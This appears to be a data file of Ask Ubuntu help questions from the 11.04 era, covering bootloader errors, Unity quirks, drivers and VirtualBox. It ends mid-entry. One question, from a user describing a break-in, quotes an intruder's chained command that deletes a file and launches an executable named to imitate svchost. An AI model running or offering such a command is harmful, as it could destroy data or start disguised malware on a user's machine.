41490	can not install burg : error during installation	i tried to install burg and i got an error . i 've used the following commands : sudo add-apt-repository ppa : n-muench/burg sudo apt-get update & & sudo apt-get install sudo apt-get install burg burg-common burg-emu burg-pc burg-themes burg-themes-common until here everything went fine , but after the following command i get the error : aneal @ ubuntu : ~ $ sudo burg-install /dev/sda3 & & sudo update-burg error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . /usr/sbin/burg-setup : warn : attempting to install grub to a partition instead of the mbr . this is a bad idea.. /usr/sbin/burg-setup : warn : embedding is not possible . grub can only be installed in this setup by using blocklists . however , blocklists are unreliable and their use is discouraged.. /usr/sbin/burg-setup : error : if you really want blocklists , use -- force . now i think i can not restart . i suppose if i boot i will get grub rescue , and i know how to get over that , my problem is how to install burg into the mbr now . edit : aneal @ ubuntu : ~ $ sudo burg-install /dev/sda & & sudo update-burg error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . installation finished . no error reported . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . generating burg.cfg ... error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . burg-probe : error : /host/ubuntu/disks/root.disk is not a block device . found linux image : /boot/vmlinuz-2.6.38-8-generic found initrd image : /boot/initrd.img-2.6.38-8-generic error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . found windows 7 ( loader ) on /dev/sda2 error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . error : can not seek `/dev/sda ' . done and same is the result with sda2 . fdisk -l result : aneal @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x97646c29 device boot start end blocks id system /dev/sda1 1 1531 12290016+ 42 sfs /dev/sda2 * 1531 1543 102400 42 sfs /dev/sda3 1543 14070 100618240 42 sfs /dev/sda4 14070 38914 199559512 42 sfs disk /dev/mmcblk0 : 3965 mb , 3965190144 bytes 49 heads , 48 sectors/track , 3292 cylinders units = cylinders of 2352 * 512 = 1204224 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/mmcblk0p1 * 4 3293 3868160 b w95 fat32
41497	evolution tasks not showing in the panel	evolution tasks do not show in the clock applet in ubuntu 11.04 . i like to see the tasks side to the appointments in the clock applet .
41498	no launcher on an acer d620 netbook	i have installed ubuntu 11.04 . i found no laincher at the left side . i wamt to know why ? secondlay , my acer netbook d260 , can not find the wifi . how i can solve it .
41502	what does firefox apparmor restrict/allow ?	i know the apparmor profiles resides in /etc/apparmor.d/ , but i do not know how to interpret it . any translation would be enlightening .
41515	what is `` change profile '' in the gnome-terminal , and why is it disabled ?	in terminal menu , inside the gnome-terminal , i have the option `` change profile '' . what is it for ? and why is it disabled ?
41526	/usr/lib/ symbolic link gets over written during boot	to get the tri-monitor setup i want , i am using the libxinerama hack that allows me fake my layout . in order to use this , i use a patched version of libxinerama and put it in /usr/lib and then change the libxinerama.so symbolic link to point to it : [ kbrandt @ alpine : /usr/lib ] ls -l libxinerama . * -rw-r -- r -- 1 root root 7286 2010-05-18 07:57 libxinerama.a lrwxrwxrwx 1 root root 20 2011-02-27 19:59 libxinerama.so - > libxinerama.so.1.0.0 lrwxrwxrwx 1 root root 20 2011-05-06 11:31 libxinerama.so.1 - > libxinerama.so.1.0.0 -rw-r -- r -- 1 root root 8659 2011-04-11 09:40 libxinerama.so.1.0.0 -rw-r -- r -- 1 root root 10432 2011-02-27 20:01 libxinerama.so.1.0.0.back this work fine , except on reboot it rewrites the link and points it to libxinerama.so.1.0.0.back which breaks my setup . what process is doing this , and how can i stop it from doing it ?
41527	where can i watch mark shuttleworth 's keynote at uds-o ?	would like to see this years keynote , has it been uploaded yet ?
41533	'lsusb ' command does n't render anything in the terminal and just stays idle	this stems from my problem with my mouse . sometimes during usage my mouse will just die on me ( the red laser still on ) . when i unplug it and replug it in , the laser does n't come back on . not even changing ports fixes the error . so after some googling i found the lsusb command to list the usb ports and what devices if any are present . however when i run it , the terminal just stays stuck there as if it were processing something . i have to alt+f4 just to close that window . with this information , maybe you can deduce what 's wrong with the command and even better , why the mouse freezes and shuts off for no reason . thanks !
41537	someone just remotely entered my computer and start googling for things . how ?	the intruder started opening windows and in firefox opened the search prompt and start typing in some commands i did n't capture . then he opened google and searched for : & fs : ik & del ik & svcnost.exe & exit what is this command ? how did someone get into my machine ? in windows this has never happened and this feels like a huge breach of security of my personal pc . i 've already went ahead and disabled remote desktop , but when it was enabled it clearly mentioned : so does this mean that anybody could have entered and messed with the machine ? i set the option to notify me when someone entered otherwise i would n't have been the wiser .
41538	gnome and unity are running at the same time	i tried to install gnome3 using a ppa . it made a mess so i reinstalled my system . now , for some reason , when i enter to the ubuntu classic session , i get both unity and gnome running at the same time ( all my gnome-panels + unity dashboard and menu ) . i suppose there is some configuration wrong in my home directory , but i have no idea of what should i change to get only gnome . any idea of how can i fix this ?
41539	how can i make running emacsclient from the unity launcher reuse an existing emacs window	( i 'm actually asking this even though i intend to supply the answer , so this is more by way of providing a tip . ) if you create an emacsclient launcher by copying a .desktop file ( e.g . the emacs one ) , it does not behave in the standard unity launcher manner . it always launches a new window ; it does n't recognize that existing emacsclient windows exist to jump to them . how can i make it behave ? as background , this is a very useful usage mode for emacs , where you run it as a daemon : emacs -- daemon , and then you summon an emacs window with emacsclient . a good way to do this for habitual emacs users is to put emacs -- daemon into your startup applications .
41541	tap device not listed in sysctl	i added a tap device using a c program . but it is not listed in sysctl like eth0 is ( for e.g . net.ipv6.conf.eth0.* ) . could someone please tell what is missing ?
41543	how to dynamically enable and disable ipv6 on an interface	how to dynamically enable and disable ipv6 on an interface so that it gets link local address when enabled ? i have tried : sysctl net.ipv6.conf.all.disable_ipv6=1 to disable ipv6 and sysctl net.ipv6.conf.all.disable_ipv6=0 to enable ipv6 . are there any other ways ?
41544	system using a lot of memory and i cant find why	my ubuntu is using an insane amount of ram memory . when i boot the machine it is using around 1,5 to 2 gig ram without me launching any applications . when i start firefox and vlc it maxes out . going to 6083716 used ( almost max ) i ca n't find the source of this memory usage . but the vlc video sound is getting distorted because of it . also when i shutdown everything running it still stays using over 5 gig of ram . the graphical system monitor is saying only 18 % is used but top and free say its almost all in use . top : mem : 6127092k total , 6083484k used , 43608k free , 22820k buffers swap : 6288380k total , 0k used , 6288380k free , 4948116k cached any ideas ?
41549	11.04 live cd does n't work ( black screen )	i have burned ubuntu 11.04 on cd then installed on desktop pc , so this cd copy is fine , but i wanted upgrade my 10.10 ( laptop , laptop is fine , too ) . i have booted to live ( try without installing ) and direct install ... both not working ... i see just black screen . there are no even any processes at laptop .
41550	how do i run a 64-bit guest in virtualbox ?	i would like to have an ubuntu 11.04 64-bit test environment . when i try booting the ubuntu 11.04 64-bit installation cd in virtualbox , the following message is displayed by virtualbox : vt-x/amd-v hardware acceleration has been enabled , but is not operational . your 64-bit guest will fail to detect a 64-bit cpu and will not be able to boot . please ensure that you have enabled vt-x/amd-v properly in the bios of your host computer . what am i doing wrong ? details : vbox.log , ubuntu-test.vbox , and /proc/cpuinfo . kernel : linux aux 2.6.38-8-generic # 42-ubuntu smp mon apr 11 03:31:24 utc 2011 x86_64 x86_64 x86_64 gnu/linux the virtualization setting in the bios is set to enabled .
41556	how can i open two half-screen windows in a row without overlapping ?	i use a monitor that is exactly 2ă1024 pixels wide as a substitute for a dual-screen configuration . in ubuntu 10.10 , i could open two windows in a row and each would be automatically placed on a different half of the screen , like this : in ubuntu 11.04 , the launcher introduces a displacement in the default location for new windows that causes them to encroach upon the other half of the screen . the resulting default behavior is now to create an overlap of the two windows : this is senseless . how can i restore the normal behavior ? also , i would like to preempt the suggestion that i simply shorten the default width of windows to accommodate the for the launcher . firstly , this defeats the purpose of having purchased a monitor this wide in the first place ; 1024 pixels is an important minimum width to meet because many popular websites are designed for this size and will display horizontal scroll bars if the windows are smaller : more importantly , though , is that i frequently use the default grid plugin in compiz to move windows from one half of the screen to the other . this action automatically resizes windows to half of the screen width , so my narrower widths would quickly be overridden .
41557	which laptop tools does ubuntu come with ?	which tools for managing laptop-specific tasks are installed by default on ubuntu ( say , 11.04 ) ? thinking about the following might be useful to get you started in answering : is it acpi that monitors the battery ? which tool controls sleep and hibernation ? which tool enables cpu frequency scaling ? is laptop mode tools installed ? powermoded ? more info about laptop tools : https : //wiki.archlinux.org/index.php/laptop
41559	smart failure predicted on harddisk after ubuntu installation on my laptop	smart failure predicted on harddisk after ubuntu installation 11.04 desktop version . press f1 to continue . i installed ubuntu .restarted my pc.now it is saying above error on boot . whats more worse is f1 key is not working.so my pc is dead now , i am not able to do anything . can anyone help me on this please ?
41561	gedit thinks everything is an apache config file	when i open a text file that does not have the .txt extension , gedit sets the syntax highlighting to apache conf every single time . this only started happening after my upgrade to 11.04 . is there a reason why gedit never recognizes plain text anymore ? edit : here 's ~/.local/share/applications/mimeapps.list . i do n't think anything looks out of the ordinary : [ added associations ] video/x-msvideo=vlc.desktop ; audio/mpeg=vlc.desktop ; application/x-extension-ini=gedit.desktop ; video/x-matroska=vlc.desktop ; x-content/audio-player=kde4-amarok.desktop ; rhythmbox.desktop ; vlc.desktop ; banshee-1-media-player.desktop ; kde-amarok.desktop ; application/x-mswrite=gedit.desktop ; video/ogg=vlc.desktop ; video/mp4=vlc.desktop ; video/quicktime=vlc.desktop ; text/x-tex=kde4-kile.desktop ; texmaker.desktop ; gedit.desktop ; emacs22-gtk.desktop ; openoffice.org-writer.desktop ; emacsclient-emacs22.desktop ; gvim.desktop ; userapp-kile-hqc94u.desktop ; video/x-flv=vlc.desktop ; application/x-font-otf=gnome-font-viewer.desktop ; application/vnd.openofficeorg.extension=file-roller.desktop ; wine.desktop ; mount-archive.desktop ; openoffice.org-calc.desktop ; image/jpeg=gthumb.desktop ; application/x-font-ttf=gnome-font-viewer.desktop ; image/x-nikon-nef=gthumb.desktop ; kde4-dngconverter.desktop ; f-spot-view.desktop ; eog.desktop ; gimp.desktop ; evince.desktop ; application/x-shellscript=gedit.desktop ; wine-extension-txt.desktop ; emacs22-gtk.desktop ; openoffice.org-writer.desktop ; emacsclient-emacs22.desktop ; application/x-cd-image=nautilus-cd-burner-open-iso.desktop ; mount-archive.desktop ; brasero.desktop ; gmount-iso.desktop ; file-roller.desktop ; vlc.desktop ; application/x-extension-htaccess=gedit.desktop ; application/x-trash=gedit.desktop ; inode/fifo=gedit.desktop ; application/x-extension-config=gedit.desktop ; application/vnd.oasis.opendocument.text=libreoffice-writer.desktop ; openoffice.org3-writer.desktop ; openoffice.org-writer.desktop ; file-roller.desktop ; mount-archive.desktop ; gedit.desktop ; application/pdf=evince.desktop ; adobereader.desktop ; video/x-ms-wmv=vlc.desktop ; video/mpeg=vlc.desktop ; image/png=gthumb.desktop ; image/x-panasonic-raw=wine-extension-raw.desktop ; f-spot-view.desktop ; gedit.desktop ; text/x-log=gedit.desktop ; wine-extension-log.desktop ; wine-extension-txt.desktop ; emacs23.desktop ; application/x-spss-sav=gedit.desktop ; text/plain=gedit.desktop ; userapp-localc-y5uvuv.desktop ; wine-extension-txt.desktop ; openoffice.org-writer.desktop ; emacs23.desktop ; gvim.desktop ; openoffice.org-calc.desktop ; audio/x-flac=vlc.desktop ; audio/midi=totem.desktop ; vlc.desktop ; gnome-mplayer.desktop ; banshee-1.desktop ; text/x-makefile=gedit.desktop ; application/rtf=libreoffice-writer.desktop ; openoffice.org3-writer.desktop ; text/x-ocaml=gedit.desktop ; image/x-eps=evince.desktop ; gimp.desktop ; gedit.desktop ; wine-extension-txt.desktop ; openoffice.org-writer.desktop ; emacs23.desktop ; gvim.desktop ; openoffice.org-calc.desktop ; gthumb.desktop ; inode/directory=nautilus-folder-handler.desktop ; vlc.desktop ; application/x-extension-ctl=gedit.desktop ; application/x-executable=wine-extension-caf.desktop ; application/xspf+xml=vlc.desktop ; totem.desktop ; banshee-1.desktop ; firefox.desktop ; google-chrome.desktop ; wine-extension-xml.desktop ; opera-browser.desktop ; thunderbird.desktop ; gedit.desktop ; wine-extension-txt.desktop ; openoffice.org-writer.desktop ; emacs23.desktop ; gvim.desktop ; openoffice.org-calc.desktop ; application/vnd.ms-publisher=gedit.desktop ; application/msword=libreoffice-writer.desktop ; application/vnd.ms-powerpoint=libreoffice-impress.desktop ; audio/x-wav=vlc.desktop ; text/html=userapp-google-chrome-yoq3qv.desktop ; application/octet-stream=userapp-wireshark-73p9rv.desktop ; application/vnd.ms-excel=libreoffice-calc.desktop ; text/csv=libreoffice-calc.desktop ; application/vnd.openxmlformats-officedocument.spreadsheetml.sheet=libreoffice-calc.desktop ; application/vnd.openxmlformats-officedocument.wordprocessingml.document=libreoffice-writer.desktop ; text/x-c++src=gedit.desktop ; wine-extension-txt.desktop ; x-scheme-handler/http=google-chrome.desktop ; x-scheme-handler/https=google-chrome.desktop ; video/3gpp=vlc.desktop ; application/x-ms-dos-executable=wine.desktop ; [ removed associations ] text/html=userapp-google-chrome-cy5rqv.desktop ; [ default applications ] x-scheme-handler/http=google-chrome.desktop x-scheme-handler/https=google-chrome.desktop video/3gpp=vlc.desktop application/x-ms-dos-executable=wine.desktop
41562	how to fix fonts in google earth 6 ?	i downloaded and installed google earth 6 64-bit from its website . and then like many users , i also encountered the ugly fonts on starting the app . i 've tried installing lsb-core and ttf-mscorefonts-installer , but i found that both are already installed . could someone help me fix this ?
41566	how do i get aero snap in unity 2d ?	i really miss the `` aero snap '' window snapping feature present in unity 3d . is there any way i can get it , or an alternative to it , in unity 2d ?
41569	can i make a *.desktop item always be maximized ?	is there anything i can add to a *.desktop file ( used in my launcher panel ) to make the application always open maximized ? in particular , i 'm looking at the gnome-terminal .
41571	pass through usb device to guest using virtualbox ?	i bought a usb dongle which i intend to use in ubuntu 10.04 . the problem is i have n't been able to find any linux drivers for it which has prompted me to find another solution : virtualbox . i intend to run windows xp as guest and plug in the dongle which will run inside windows easily . the challenge for me is in making sure ubuntu gets the connection too and i do all my web development stuff inside linux . windows has to be just a gateway . thanks
41576	make zeitgeist aware of downloaded files from firefox/chrome	i 'd like to make zeitgiest aware of files i 've downloaded from chrome/firefox . currently zeitgeist only becomes aware of them once they 've been opened in some other program . this would be helpful for manipulating downloaded files in synapse/gnome activity journal/ '' recent items '' etc .
41578	how do i install packages on kubuntu ?	i just downloaded and installed kubuntu 11.04 with wubi and everything seemed to go fine . a friend of mine told me i was going to love kubuntu but i ca n't figure out how to install any additional software ! ! it 's like there 're no repositories and i 'm not familiar with apt . when i run kpackagekit ( the only installer i could find ) it only finds software that 's currently installed .
41586	ubuntu 11.04 + radeon 4850 = performance problems and graphic problems	i did not install ubuntu 11.04 on the first day because i tought : okey maybe there are some bugs , i give them some days so they can fix them . but now i got it with the hope the most anoying bugs are gone . but they are not . not for me with my ati card . im got the newest ati catalyst 11.4 - but still there are a lot of performance problems . the window is moving very very slow . and its bucking hard . i dont have fun with compiz : ( but even if i deactivate every effects , there are still the performance and bucking problems . when will ubuntu fix these problems ? are there some solutions ? the problem is the new xorg right ? why are they putting a new xorg without testing it ? thank you !
41591	why do i have slow download speed on my system upgrades ?	i have very slow download speed when i do sudo apt-get update and sudo apt-get upgrade . i have natty 11.04 , i upgraded from 10.10 to the beta . the speed is down at b/s and not at the normal kb/s ( note not kbit/s ) . fetched 2,621 b in 19s ( 133 b/s ) fetched 2,621 b in 20s ( 129 b/s ) why do i have the slow download speed ? can i fix it in any way ?
41593	what 's the criteria for an application to be included in the universe repository ?	i started a hobby project and figured that if there were some reasonably reachable criteria for this , i might as well work in that direction . tried asking on # ubuntu-app-devel , but the channel seems kinda dead .
41597	how do i set my printer up or check the printers status under the unity interface	unity has me very confused . my printer had a jam but there was n't any status letting me know under unity . when i sent a job to the printer the print job icon display and just showed waiting . pointed firefox at the printer it showed a jam . i tried to dig deeper in unitys interface but did not find anything referring to printer or any system settings . how do i get to the settings , especially the printer ? the printer is a hp c4750 connected through wifi .
41598	apps launched from shell scripts do not run from unity bar	i can run oracle 's sql developer 3.0 by clicking on `` sqldeveloper.sh '' from the file manager and then clicking `` run '' . when i add it to the unity menu ( right-click running icon in menu , click `` keep in launcher '' , the new icon does n't work . once i close sql developer , i click on the new icon in the unity bar and it does nothing except flash a few times .
41600	ubuntu 11.04 wont install at all	hello to you and first i want to thank you for taking the time to help me . i 've used ubuntu in the past ( 9.04 ) but pc was n't good enough . so now i just bought myself all new hardware and built a new pc from scratch . so i saw a new opportunity to give ubuntu a chance , or more ubuntu giving me a chance to use it ; - ) so i go to the ubuntu 's website , select the 11.04 64bit , download , burn onto a dvd . but than i boot from the dvd , i see the loading logo , but then i get this really weird screen bug and can not continue with the install . **intel core i7 870 2.93g s1156 - ocz ssd 60gigs drive - 4 gigs 1600mhz corsair ddr3 ram - evga gt240 1024m ddr5 video card - ga-p55a-ud3 motherboard** so i was wondering what could i do to be able to install . i 've played a bit with the bios and downloaded and burned so many copy of ubuntu without any success . thanks you so much in advance for your help . sincerely yours .
41601	is there any recovery software available for ext4 ?	well , i have accidentally deleted my ubuntu drive . i just want to recover all the contents of /home . is there a way to do it ? i referred to foremost , where i need to specify the extensions of files . and in my case , i do n't know actual extensions . so , is there any utility which can let me recover my /home folder alone ? i have not even formatted that drive or touched it at all . so no write has been done on that drive . if you have suggestions on how to recover , please tell me .
41602	how to use @ ubuntu.com email address using thunderbird ?	i am an ubuntu member and have an @ ubuntu.com email address . i want to use this address to reply to mails from using thunderbird . right now this email address is mapped my one of my email-id on google apps . i tried adding my account on thunderbird since i do not know the password , i left it and went ahead and met a dead end anyone has been successful in adding that email id . i have the actual email added in thunderbird to which this email id maps to . do i need to modify that ?
41603	is there an equivalent of the file-browser applet for unity ?	i really , really miss the file-browser-applet that was available in the gnome panel -- is there an equivalent for unity ?
41605	trouble downloading updates due to a `` hash sum mismatch '' error	when i check for updates , i get a `` failed to download repository information '' error . this is what comes up under details : w : failed to fetch gzip : /var/lib/apt/lists/partial/us.archive.ubuntu.com_ubuntu_dists_natty_main_source_sources hash sum mismatch , e : some index files failed to download . they have been ignored , or old ones used instead .
41606	how do i install the sun java development kit ( jdk 7 ) ?	how to install jdk 7 on ubuntu ? the installation should be with the tar archive . i know the basic installation with the bin , but how to do with only a tar archive ?
41610	how do i rebuild a package to include debugging information ?	i want to rebuild a package to include debugging symbols , how would i do that ? there is no -dbg package available and also no -dbgsym package from the ddebs repository .
41614	change timezone in 10.04/11.04 without user input	how can one change the time-zone in ubuntu 10.04 or 11.04 server from the command line without user input ( e.g . tzconfig est ) . while one would use dpkg-reconfigure tzdata , per the related question how to change the time-zone settings from the command line , with user interaction , i ca n't seem to find out how to change the time-zone from within a non-interactive a script . the solution is meant to be part of an installation script that configures a server . thank you for reading .
41615	how to install canon pixma ip1600 ?	i have a canon ip1600 connected wireless through win system laptop , i just ca n't install the printer although i 've googled and tried various ways recommended . i 'm at my wit 's end !
41621	how do i install experimental plugins for compiz ?	how to install all plugins compiz in ubuntu natty 11.04 ? i ca n't install unsupported plugins i want to install experimental plugins , not the ones in compiz-plugins-extra . these plugins were installed by git in previous versions of compiz with a script ( 0.8.x ) : atlantis cubemodel fakeargb tile snow
41627	compiz hides komodo 's calltip	komodo edit/ide shows a tooltip for functions and such , but it does n't show up when using compiz . only when you disable compiz does the tooltip show . that 's a problem , of course . does anybody know a fix ? is saw there 's a fix for tooltips in firefox , which komodo is based upon .
41629	after upgrade gdb wo n't attach to process	i just recently upgraded from 10.04 to 11.04 and gdb wo n't allow me to attach to processes anymore i get the error attaching to process 10144 could not attach to process . if your uid matches the uid of the target process , check the setting of /proc/sys/kernel/yama/ptrace_scope , or try again as the root user . for more details , see /etc/sysctl.d/10-ptrace.conf ptrace : operation not permitted . how do i fix this so that i can debug again without sudo ?
41632	how to enable notification area ( systray ) for pidgin	the pidgin icon wo n't appear in the notification area . i have already checked if the `` show system tray icon option '' is set to `` always '' in the pidgin preferences . i did n't find an equivalent solution as those in the case of unity .
41636	how do i write a screenlet ?	i 'm trying to write a screenlet . it should basically just display a background ( could be generated in screenlet or svg ) and display some text . i know about the template screenlet and documentation , but even the template screenlet does n't work for me . i 'm using ubuntu 11.04 and screenlets from the software centre .
41643	how to convert multiple iso8859-1 to utf-8	am trying to convert several sql files from iso8859-1 to utf-8 am doing the following command : iconv -f iso_8859-1 -t utf-8 *.sql what i get is an output of their content to the terminal which is very long and after ending the output they do not convert . they stay the same . i wish to be able to convert and not see the output .
41645	why is compiz crashing whenever i try to load saved settings ?	i recently installed a fresh version of 11.04 to replace a previous installation of 10.10 . i had a .profile file saved that had all my preferences for compiz . windows wobbled just right , there was just the right amount of flame when i closed windows , i had all my shortcut keys and desktop cube effects set perfectly . however , whenever i try to import my .profile file , compiz dies . all the window frames disappear , none of the settings take effect , and some windows become unclickable . the only way to get back to usability is to reset to default and then reboot . ( by the way , i 'm using gnome still ... a.k.a ubuntu `` classic '' . i 'm not interested in unity for my desktop computer . ) what 's going on ? ca n't i get my saved preferences back ?
41648	how does ubuntu handle file-system fragmentation ?	this could be for any file system but ext4 works . does ubuntu need to be defragged like windows . does it do this on its own .
41654	how to add ocred text to original pdf in gscan2pdf ?	i am new to gscan2pdf 0.9.31 , and just used it to ocr a scanned pdf . after saving the pdf , the ocred text is stored on the top left corner . however i wish each ocred character to be added to exactly where it was ocred from , to make the pdf file text-selectable . can i do that ? thanks and regards !
41655	application keyboard shortcuts ca n't modify in gnome	i have gconftool set to /desktop/gnome/interface/can_change_accels true , but ca n't assign or modify any application accelerators in ubuntu 11.04 .
41658	the about me dialog does n't save information	i just installed a fresh copy of 11.04 and have been setting up my preferences . i have noticed while doing this that the about me dialog does not save anything that i put in . i can totally fill the dialog out , close it , and when i reopen it , it is blank . what is going on ? i have never had any trouble like this out of any of the other ubuntu versions prior to 11.04 .
41659	auto-login not working	i 'm trying to get ubuntu 11.04 to login automatically , but the login screen options do n't seem to allow this . there is no option to select my username , as this screenshot shows : any ideas ?
41660	i wanted to use elementary-dark-mono icons on my panel	i have downloaded faenza-fresh icon theme . this theme inherits faenza cupertino . faenza cupertino , in the other hand , inherit faenza . so , my panel icons become dark and very hard to see because my panel is dark in color . i really love elementary-dark-mono icons on my panel . how do i change the .theme in order for this faenza-fresh icon theme uses elementary-dark-mono icons only on my panel ? here is the .theme file for faenza fresh : icon theme ] name=faenza-fresh inherits=faenza-cupertino , elementary-mono-dark
41661	what will happen to default unity launcher when cairo dock is installed ?	my question is will the default unity launcher be permanently be hidden when cairo dock is installed or not ? if it will not be hidden how cam the two be managed together ?
41663	any open source alternative to roboform	are there any open source apps for password management like roboform in win 7 or can roboform be used in 11.04 64 bit ? if so how ?
41667	how is sfs partition different than other ?	i have sfs partitions . how this partition is different than other linux partition ? can it be converted to other and vice versa without losing data ? aneal @ ubuntu : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x97646c29 device boot start end blocks id system /dev/sda1 1 1531 12290016+ 42 sfs /dev/sda2 * 1531 1543 102400 42 sfs /dev/sda3 1543 14070 100618240 42 sfs /dev/sda4 14070 38914 199559512 42 sfs disk /dev/mmcblk0 : 3965 mb , 3965190144 bytes 49 heads , 48 sectors/track , 3292 cylinders units = cylinders of 2352 * 512 = 1204224 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/mmcblk0p1 * 4 3293 3868160 b w95 fat32
41668	how do i make a quicklist for umplayer ?	it 's very useful/great multimedia player and more . youtube search , watch and saving features , too many file formats that can play etc . how can i make umplayer quicklist for unity icon ? note : umplayer -h parameters are complicated , i tryed but ...
41670	grub does not allow me to boot into hard drive	i have n't ever know what grub is until i try this command to make my pen drive bootable . cd /media/usbdisk/boot/grub i am now stuck at grub command line . i try to boot from available kernel but kernel command is not available so i use xnu_kernel command but it goes to error : kernel does n't contain suitable 32-architecture please help me to recover booting my hard-drive !
41672	gnome 3 panel distorted graphics	i recently installed gnome 3 on ubuntu natty . its working fine , except that the background on the panel is distored . what could be the problem ? thanks
41677	super ( windows ) key no longer works in programs	using programs that require the super key in a shortcut combination is now overridden by unity . for example , terminator , which uses super-g to group commandwindows can no longer be used as the menu keeps popping up removing the focus on the terminator window . how to remedy this ?
41679	google chrome does not keep cookies .	there have been a number of users reporting this starting as early as google chrome 11.0.696 on lucid lynx . i am seeing it currently on chrome version 16.0.912.75 ( official build 116452 ) on oneiric ocelot . despite having the cookies setting set to allow all cookies , and the `` clear cookies on shutdown '' option unchecked , all cookies ( and sessions that rely on cookies to be persistent ) are cleared . this makes using the browser very tedious if you ( like me ) shut down the browser at the end of the day . i am currently looking into the 'bug ' status of this ; however if there is a workaround i can apply in the mean time that would be great ! or if anyone has any further information as to the cause of this bug ( i am aware not all users are victim to this behaviour ) . to better explain the issue i have created a small video ( do n't mind the slow internet connection ) which can be seen here
41680	how do i set custom keyboard shortcuts in unity via gconftool ?	i have added few custom keyboard shortcuts via `` keyboard shortcuts '' app in unity . it used to go gconf file under /apps/metacity/keybinding_commands/ section in ubuntu 10.10 . but , i could n't find the same in ubuntu 11.04 . how do i achieve setting custom shortcuts using gconftool or similar tool from command line ?
41681	blank screen after installing nvidia restricted driver	i 've installed the current nvidia restricted driver and rebooted my machine and now i get a black or blank screen . how can i fix this ?
41684	which intel video cards do not have an open source driver ?	nearly all intel video cards have open source driver and therefore work fine under ubuntu , however , i would like to know which are the ones that do n't ? i want to buy a laptop and need to know which cards should i watch out for . i am not considering intel cards that have closed source driver , i would be better off with nvidia then .
41685	how to remove the panel on the right on my screen ?	since this morning , probably due to ubuntu or gnome-shell updates yesterday , i get this annoying panel on the right of my screen . it appears over my scrollbar , which makes it unusable . has anybody else encountered this problem ? how can i remove it ? i guess there must be some setting in dconf-editor , but i do n't know which one .
41688	how to download packages without using the software center ?	where can i manually download stuff from ( in a user friendly way ) without using the ubuntu software center ? and if that 's not possible , how can i fix the proxy restrictions of the software center . it does n't seem to work at the only place where i have good internet access although all other sites work perfectly fine .
41689	re-install natty on top of an existing set up - possible ?	i seem to have broken some critical library bindings on my ubuntu studio set up by `` upgrading '' ( and the quotes here do indicate a note of sarcasm ) from meerkat to natty beta . the release version did n't fix what was botched . so , essentially , i have no way to run any app requiring glx . even glxinfo dies with a segment violation . unity shrugs and drops me into classic mode automatically now too . it 's been 3 weeks , and i have n't found any suitable answers anywhere that will allow me to use this system the way i need to use it . so , i 'm left with a final option - reinstall the system and see if it will work . ( if not , i 'll drop back to 10.10 until the world catches up again ) . question : is it possible to re-load the system from an .iso without having to also reformat/repartition the drive ?
41699	problem with grub	i have an intel i5 660 , i 've installed only ubuntu 11.04 but when i boot my screen remains black , i can hear classic login sound but nothing happen , unique way to enter in ubuntu is in recovery mode and all works perfectly . so i suppose that problem is in grub.. can someone help me , are several days that i 'm tring to resolve it without find a solution : - ( here my .xsession-errors : /etc/gdm/xsession : beginning session setup ... setting im through im-switch for locale=it_it . start im through /etc/x11/xinit/xinput.d/all_all linked to /etc/x11/xinit/xinput.d/default . gnome_keyring_control=/tmp/keyring-hprfr6 gnome_keyring_control=/tmp/keyring-hprfr6 gnome_keyring_control=/tmp/keyring-hprfr6 ssh_auth_sock=/tmp/keyring-hprfr6/ssh gnome-session [ 1325 ] : warning : could not launch application 'smartpanel.desktop ' : unable to start application : esecuzione del processo figlio `` /opt/samsung/smartpanel/bin/smartpanel '' non riuscita ( file o directory non esistente ) ** message : adding killswitch idx 0 state killswitch_state_unblocked ** message : killswitch 0 is killswitch_state_unblocked ** message : killswitches state killswitch_state_unblocked ** message : killswitch 0 is killswitch_state_unblocked ** message : killswitches state killswitch_state_unblocked initializing nautilus-gdu extension ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( nautilus:1396 ) : glib-gobject-critical ** : g_value_get_object : assertion `g_value_holds_object ( value ) ' failed ( 